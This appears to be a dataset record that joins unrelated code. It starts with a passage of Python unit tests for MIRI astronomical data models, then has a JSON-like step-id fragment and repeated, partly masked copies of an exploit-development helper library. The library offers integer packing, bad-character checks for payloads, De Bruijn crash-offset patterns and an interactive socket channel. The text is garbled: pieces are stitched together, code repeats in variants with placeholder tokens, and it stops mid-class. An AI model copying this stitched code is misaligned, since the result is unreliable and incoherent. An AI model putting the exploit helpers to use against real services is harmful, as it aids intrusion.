[[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]\n b4x3 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\n #c4x3 = [[0,1,0,0],[0,0,1,0],[1,0,0,1]]\n \n a4x1 = [4,3,2,1]\n b4x1 = [1,2,1,2]\n c4x1 = [0,1,0,0]\n \n #a5x1 = [5,4,3,2,1]\n #b5x1 = [1,2,3,2,1]\n c5x1 = [0,1,0,0,1]\n \n # Create an object with 4x3 primary and error arrays but a 4x1\n # quality array. This should succeed because the quality array\n # is broadcastable.\n newdp1 = MiriMeasuredModel(data=a4x3, err=b4x3, dq=c4x1)\n self.assertTrue( np.allclose(a4x3, newdp1.data) )\n self.assertTrue( np.allclose(b4x3, newdp1.err) )\n self.assertTrue( np.allclose(c4x1, newdp1.dq) )\n\n # 5x1 is not broadcastable onto 4x3 and this statement should fail.\n # NOTE: Unfortunately this test also issues a warning message,\n # \"'MiriMeasuredModel' object has no attribute '_real_cls'\".\n # Turning off warnings does not stop this message from appearing.\n self.assertRaises(TypeError, MiriMeasuredModel, data=a4x3,\n error=b4x3, quality=c5x1)\n \n # Combine two broadcastable object mathematically.\n # The + and - operations should be commutative and the result\n # should be saveable to a FITS file.\n newdp2 = MiriMeasuredModel(data=a4x1, err=b4x1, dq=c4x1)\n \n result1 = newdp1 + newdp2\n result2 = newdp2 + newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue( np.allclose(result1.data, result2.data) )\n self.assertTrue( np.allclose(result1.err, result2.err) )\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n result1 = newdp1 * newdp2\n result2 = newdp2 * newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue( np.allclose(result1.data, result2.data) )\n self.assertTrue( np.allclose(result1.err, result2.err) )\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, 
overwrite=True)\n del result1, result2\n\n # The - and / operations are not commutative, but the data shape\n # should be consistent and the quality arrays should be combined\n # in the same way.\n result1 = newdp1 - newdp2\n result2 = newdp2 - newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue( np.allclose(result1.err, result2.err) )\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n result1 = newdp1 / newdp2\n result2 = newdp2 / newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n # The errors resulting from division depend on the order\n # of the operation.\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n def test_description(self):\n # Test that the querying and description functions work.\n # For the test to pass these need to run without error\n # and generate non-null strings.\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n \n # Attempt to access the SCI, ERROR and DQ arrays through attributes.\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n \n # Most of the necessary tests are already carried out by\n # the 
TestMiriMeasuredModel class.\n\n def setUp(self):\n # Create a ramp data product.\n # NOTE: A ramp product does not contain an ERR array.\n self.a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n self.c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n self.c2 = [[0,1,1,0], [1,0,0,1], [1,0,1,0]]\n self.acube = [self.a1,self.a1,self.a1]\n self.ccube = [self.c1,self.c2,self.c1]\n self.ahyper = [self.acube,self.acube]\n self.chyper = [self.ccube,self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.refout,\n pixeldq=self.c1,\n dq_def=pixeldq_flags,\n groupdq=self.chyper,\n groupdq_def=groupdq_flags)\n # Add some example metadata.\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1',\n ccc_pos='OPEN',\n deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST',\n nints=1, ngroups=1,\n frame_time=1.0,\n integration_time=10.0,\n group_time=10.0,\n reset_time=0, frame_resets=3)\n self.testfile = \"MiriRampModel_test.fits\"\n \n def tearDown(self):\n # Tidy up\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n # Remove temporary file, if able to.\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = \"Could not remove temporary file, \" + self.testfile + \\\n \"\\n \" + str(e)\n warnings.warn(strg)\n\n def test_creation(self):\n # Test that any of the quality arrays are optional.\n b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n bcube = [b1,b1,b1]\n bhyper = [bcube,bcube]\n \n # 1) Data array only. Data array must exist and be non-empty.\n # The quality arrays must be 2-D and 4-D.\n # Unspecified arrays must be filled with default values. 
\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n # Assumes default is 0.0 - see schema\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n # Assumes default is 0 - see schema\n # FIXME: The pixeldq array ends up containing null values.\n #self.assertEqual(np.mean(newdp1.pixeldq), 0)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n # Assumes default is 0 - see schema\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n\n # 2) Data and both quality arrays. All arrays must exist,\n # be non-empty and be the shape specified.\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n # The pixeldq array must not be full of default values.\n self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n # The groupdq array must not be full of default values.\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n\n # 3) Data and pixeldq array only. All arrays must exist,\n # be non-empty and be the shape specified.\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n # The pixeldq array must not be full of default values.\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n\n # 4) Data and groupdq array only. 
All arrays must exist,\n # be non-empty and be the shape specified.\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n # The groupdq array must not be full of default values.\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n # The groupdq array must not be full of default values.\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n\n # It should be possible to set up an empty data product with\n # a specified 4-D shape. Data array should be\n # initialised to the same shape.\n emptydp = MiriRampModel( (2,2,2,2) )\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2,2,2,2))\n self.assertIsNotNone(emptydp.pixeldq)\n #self.assertEqual(emptydp.pixeldq.shape, (2,2))\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2,2,2,2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n \n # A null data product can also be created and populated\n # with data later.\n nulldp = MiriRampModel( )\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n \n # Creating an object with other than 4 dimensions must fail.\n a1d = [10,20,30,40]\n c1d = [1,0,0,0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n\n a2d = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n c2d = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, 
data=a3d, groupdq=c3d)\n\n # The pixeldq array must be 2-D.\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n # The groupdq array must be 4-D.\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n # Ramp data must have a dq array which gives a view of one\n # or both of the pixeldq and groupdq masks\n self.assertIsNotNone(self.dataproduct.dq)\n\n # Create a data product masked by the pixeldq array.\n # The dq and pixeldq arrays must be the same\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all( mask1.dq == mask1.pixeldq ))\n del mask1\n\n # Create a data product masked by the groupdq array.\n # The dq and groupdq arrays must be the same\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all( mask2.dq == mask2.groupdq ))\n del mask2\n\n # Create a data product masked by both pixeldq and groupdq arrays.\n # The result must have the same shape as the groupdq array but be\n # a combination of both masks.\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq 
| mask3.pixeldq\n self.assertTrue(np.all( mask3.dq == expected ))\n del mask3\n\n def test_arithmetic(self):\n # The ramp data model supports all the arithmetic operations\n # supported by the MiriMeasuredModel. The following are exceptions\n # specific to the ramp model.\n \n # Create a data model in which the DATA and DQ arrays have different\n # shapes.\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n \n # Suppress warning about the DQ array being propagated only from GROUPDQ\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # Check the product can be combined with itself\n double = testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all( (double.data - expected) < 0.001 ))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n \n # When this is combined with another data product, the DATA\n # array is masked with both the pixeldq and groupdq arrays.\n warnings.simplefilter(\"ignore\")\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n \n def test_fitsio(self):\n # Suppress metadata warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # Check that the data product can be written to a FITS\n # file and read back again without changing the data.\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal( self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq','groupdq'],\n tables=['pixeldq_def', 'groupdq_def'] )\n del readback\n \n def test_description(self):\n # Test that the querying and description functions 
work.\n # For the test to pass these need to run without error\n # and generate non-null strings.\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n \n # Attempt to access the SCI, REFOUR and DQ arrays through attributes.\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n \n # Most of the necessary tests are already carried out by\n # the TestMiriMeasuredModel class.\n\n def setUp(self):\n # Create a slope data product.\n a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n acube = [a1,a1,a1]\n bcube = [b1,b1,b1]\n ccube = [c1,c1,c1]\n dcube = [a1,b1,a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube,\n dq=ccube, dq_def=master_flags,\n zeropt=dcube, fiterr=dcube)\n # Add some example metadata.\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F2550W',\n ccc_pos='OPEN',\n deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW',\n nints=3, ngroups=10,\n frame_time=1.0,\n integration_time=100.0,\n group_time=1000.0,\n reset_time=0, frame_resets=3)\n self.testfile = \"MiriSlopeModel_test.fits\"\n \n def tearDown(self):\n # Tidy up\n del self.dataproduct\n # Remove temporary file, if able to.\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = \"Could not remove 
temporary file, \" + self.testfile + \\\n \"\\n \" + str(e)\n warnings.warn(strg)\n\n def test_creation(self):\n # Creating an object with other than 3 dimensions must fail.\n a1d = [10,20,30,40]\n b1d = [1,2,3,4]\n c1d = [1,0,0,0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d,\n dq=c1d)\n\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d,\n dq=c2d)\n\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d,\n dq=c4d)\n\n def test_copy(self):\n # Test that a copy can be made of the data product.\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal( self, self.dataproduct, datacopy,\n arrays=['data', 'err', 'dq',\n 'nreads', 'readsat', 'ngoodseg',\n 'zeropt', 'fiterr'],\n tables='dq_def' )\n del datacopy\n\n def test_fitsio(self):\n # Suppress metadata warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # Check that the data product can be written to a FITS\n # file and read back again without changing the data.\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal( self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq',\n 'nreads', 'readsat', 'ngoodseg',\n 'zeropt', 'fiterr'],\n tables='dq_def' )\n del readback\n \n def test_description(self):\n # Test that the querying and description functions work.\n # For this test to pass these only need to run without error.\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n \n # Attempt to access the SCI and DQ arrays through attributes.\n descr = 
str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n# If being run as a main program, run the tests.\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
19,
23,
27,
28,
31
]
}
|
[
19,
23,
27,
28,
31
] |
<|reserved_special_token_0|>
def e(d):
    """UTF-8 encode the string *d* and return the resulting bytes."""
    encoded = d.encode('UTF-8')
    return encoded
<|reserved_special_token_0|>
def u32(d):
    """Interpret *d* (exactly 4 bytes) as a little-endian unsigned 32-bit
    integer and return its numeric value."""
    (value,) = unpack('<I', d)
    return value
<|reserved_special_token_0|>
def validate(data, badchars):
    """Assert that no badchar occurs in data."""
    # Raises AssertionError as soon as any forbidden byte is present.
    assert not any(bad in data for bad in badchars)
<|reserved_special_token_0|>
def hexdump(data):
    """Return a hexdump of *data*, formatted similarly to `hexdump -C`.

    Each row shows the offset, two groups of up to eight hex byte values,
    and an ASCII rendering where non-printable bytes appear as '.'.
    """
    glyphs = b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
    rows = []
    for offset in range(0, len(data), 16):
        chunk = data[offset:offset + 16]
        pairs = ['{:02x}'.format(byte) for byte in chunk]
        ascii_repr = ''.join(chr(byte) if byte in glyphs else '.' for byte in chunk)
        rows.append('{:08x} {:23} {:23} |{}|'.format(
            offset, ' '.join(pairs[:8]), ' '.join(pairs[8:]), ascii_repr))
    return '\n'.join(rows)
class Term:
    """ANSI/VT100 SGR code fragments used to colorize terminal output."""
    # Foreground color codes (SGR parameters 30-37).
    COLOR_BLACK = '30'
    COLOR_RED = '31'
    COLOR_GREEN = '32'
    COLOR_BROWN = '33'
    COLOR_BLUE = '34'
    COLOR_MAGENTA = '35'
    COLOR_CYAN = '36'
    COLOR_WHITE = '37'
    # Attribute codes.
    CLEAR = '0'  # reset all attributes
    UNDERLINE = '4'
    BOLD = '1'
    # A full escape sequence is presumably assembled as
    # ESCAPE_START + code(s) + ESCAPE_END by ansi() (defined elsewhere).
    ESCAPE_START = '\x1b['  # CSI introducer
    ESCAPE_END = 'm'  # SGR terminator
<|reserved_special_token_0|>
class DisconnectException(Exception):
    """Raised by Channel.recv() when the remote end has disconnected."""
    pass
class Pattern:
    """De-Bruijn sequence generator.

    Builds a pattern of the requested length in which short substrings are
    unique, so the position of any fragment (e.g. one recovered from a
    crashed register) can be located with offset().
    """
    # Symbol set the sequence is drawn from (62 characters).
    alphabet = string.digits + string.ascii_letters

    def __init__(self, length):
        # Pick the smallest window size n with len(alphabet)**n >= length;
        # a De Bruijn sequence of order n covers that many positions.
        if length <= len(self.alphabet):
            self._seq = self.alphabet[:length]
        elif length <= len(self.alphabet) ** 2:
            self._seq = self._generate(2)[:length]
        elif length <= len(self.alphabet) ** 3:
            self._seq = self._generate(3)[:length]
        elif length <= len(self.alphabet) ** 4:
            self._seq = self._generate(4)[:length]
        else:
            # Fixed grammar of the error message ("way to" -> "way too").
            raise Exception('Pattern length is way too large')

    def _generate(self, n):
        """Generate a De Bruijn sequence of order n over self.alphabet.

        Uses the standard recursive (Lyndon-word concatenation) algorithm;
        'sequence' collects alphabet indices which are mapped to characters
        at the end.
        """
        k = len(self.alphabet)
        a = [0] * k * n
        sequence = []

        def db(t, p):
            if t > n:
                if n % p == 0:
                    sequence.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)
        db(1, 1)
        return ''.join(self.alphabet[i] for i in sequence)

    def bytes(self):
        """Return this sequence as bytes."""
        return e(self._seq)

    def __str__(self):
        """Return this sequence as string."""
        return self._seq

    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.

        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.

        Raises ValueError if the needle is absent or not unique.
        """
        if isinstance(needle, int):
            # Integers are first converted to their packed little-endian form.
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
            needle = d(needle)
        idx = self._seq.index(needle)
        # An offset is only meaningful when the needle occurs exactly once.
        if self._seq[idx + len(needle):].find(needle) != -1:
            # Fixed spelling of the error message ("occurances").
            raise ValueError('Multiple occurrences found!')
        return idx
class Channel:
    """Convenience wrapper around a socket."""
    # Colors used by _prettyprint to distinguish traffic direction.
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE

    def __init__(self, sock, verbose):
        # sock: a connected socket; verbose: echo all traffic to stdout.
        self._s = sock
        self._verbose = verbose
        # Received-but-unconsumed data; recv() drains this first.
        self._buf = bytearray()

    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.
        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        # Tags used to classify runs of bytes.
        TEXT = 0
        BINARY = 1
        # Heuristic thresholds:
        #   X: printable runs no longer than this, following binary data,
        #      are displayed as binary anyway (see step 3).
        #   Y: minimum length of a printable run eligible for splitting.
        #   Z: distance from the run's end at which a repeated padding
        #      character is looked for.
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Step 1: classify every byte as TEXT or BINARY.
        parts = []
        curr = ''  # NOTE(review): unused variable
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Step 2: merge consecutive bytes with the same tag into runs.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i + 1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            extra = []
            # Long printable runs (not at the very end) that contain a long
            # repetition of a single character near their tail are split:
            # the bytes after the repetition are reclassified as BINARY.
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                if end - start >= Y + 2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Step 3: render the runs with ANSI attributes.
        buf = ''
        last = None
        for tag, value in parts:
            # Very short printable runs right after binary data are shown
            # as binary to avoid rapid style flicker.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        print(buf, end='')
        sys.stdout.flush()

    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose

    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.
        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            buf = self._s.recv(65536)
            # An empty read with an empty internal buffer means the peer
            # closed the connection.
            if not buf and not self._buf:
                raise DisconnectException('Server disconnected.')
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # Serve (up to) n bytes from the front of the internal buffer.
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf

    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)

    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.
        The first occurrence of delim is included in the returned buffer.
        """
        buf = b''
        while not delim in buf:
            buf += self.recv(1)
        return buf

    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.
        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            # Read byte-wise so no data beyond the match is consumed.
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match

    def recvline(self):
        """Receive and return a line from the remote end.
        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')

    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)

    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))

    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')

    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        # Disable verbose echoing: the user now sees the traffic directly.
        self._verbose = False
        try:
            while True:
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        data = sys.stdin.buffer.read1(1024)
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info('Server disconnected.')
            return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def e(d):
    """Encode the given string instance using UTF-8."""
    return str.encode(d, 'UTF-8')
<|reserved_special_token_0|>
def p32(d):
    """Pack *d* into 4 bytes as a little-endian unsigned 32-bit integer."""
    packed = pack('<I', d)
    return packed
def u32(d):
    """Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
    value, = unpack('<I', d)
    return value
<|reserved_special_token_0|>
def print_bad(msg):
    """Print msg as a failure message ('[-]' prefix), colored magenta."""
    line = ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR)
    print(line)
def print_info(msg):
    """Print msg as an informational message ('[*]' prefix)."""
    print('[*] {}'.format(msg))
<|reserved_special_token_0|>
def validate(data, badchars):
    """Assert that no badchar occurs in data."""
    # One assertion per forbidden byte; still raises AssertionError on hit.
    for bad in badchars:
        assert bad not in data
def is_printable(b):
    """Return true if the given byte is a printable ASCII character."""
    printable_bytes = string.printable.encode('UTF-8')
    return b in printable_bytes
def hexdump(data):
    """Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
    glyphs = b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'

    def render(offset, chunk):
        # One output row: offset, two hex columns of 8 bytes, ASCII column.
        pairs = ['{:02x}'.format(c) for c in chunk]
        text = ''.join(chr(c) if c in glyphs else '.' for c in chunk)
        return '{:08x} {:23} {:23} |{}|'.format(
            offset, ' '.join(pairs[:8]), ' '.join(pairs[8:]), text)

    return '\n'.join(render(off, data[off:off + 16])
                     for off in range(0, len(data), 16))
class Term:
    """ANSI terminal SGR escape-code fragments."""
    # Foreground color parameter codes.
    COLOR_BLACK = '30'
    COLOR_RED = '31'
    COLOR_GREEN = '32'
    COLOR_BROWN = '33'
    COLOR_BLUE = '34'
    COLOR_MAGENTA = '35'
    COLOR_CYAN = '36'
    COLOR_WHITE = '37'
    # Text attribute parameter codes.
    CLEAR = '0'  # reset all attributes
    UNDERLINE = '4'
    BOLD = '1'
    # CSI prefix (ESC '[') and SGR suffix that bracket the parameter list.
    ESCAPE_START = '\x1b['
    ESCAPE_END = 'm'
<|reserved_special_token_0|>
class DisconnectException(Exception):
    """Raised when the remote end closes the connection."""
    pass
class Pattern:
    """De-Bruijn sequence generator.

    Produces a pattern in which every length-n subsequence is unique, so the
    position of a value observed in a crash can be recovered with offset().
    """
    alphabet = string.digits + string.ascii_letters

    def __init__(self, length):
        # Pick the smallest subsequence length n whose De Bruijn sequence
